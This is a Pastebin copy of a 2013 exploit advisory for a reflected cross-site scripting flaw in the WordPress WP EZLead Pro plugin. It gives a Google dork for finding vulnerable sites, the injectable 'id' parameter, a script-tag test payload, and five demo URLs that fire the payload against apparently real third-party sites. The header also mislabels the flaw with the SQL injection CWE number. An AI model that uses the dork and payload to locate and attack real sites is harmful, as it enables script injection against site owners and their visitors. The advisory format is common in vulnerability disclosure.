Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################
- # Exploit Title : Wordpress WP EZLead Pro plugin Cross site scripting
- # Exploit Author : Ashiyane Digital Security Team
- # Vendor Homepage : http://alain-daniel.com/produits_recommandes/ezleadpro
- # Google Dork : inurl:wp-content/plugins/ezleadpro
- # Date: 2013-12-22
- # Remote : Yes
- # Risk : Low
- # CWE : CWE-89
- # Tested on: Windows 7 & Linux
- # Discovered by : ACC3SS
- ------------------------------------------------
- #
- # Exploit : Cross site scripting
- #
- # Location : localhost/wp-content/plugins/ezleadpro/lp/index.php?id=[xss]
- #
- # Method : Get
- #
- # Script For Test : "/><script>alert(1);</script>
- #
- ------------------------------------------------
- #
- # Demo:
- #
- # http://busiXneslife.ru/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
- #
- #
- http://innoXvativeinfomarketing.com/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</
- script>
- #
- # http://korXotkovv.ru/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
- #
- #
- http://poXstoiannidohod.ru/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
- ;
- #
- #
- http://zXhannamitina.com/wp-content/plugins/ezleadpro/lp/index.php?id="/><script>alert(1);</script>
- #
- ######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
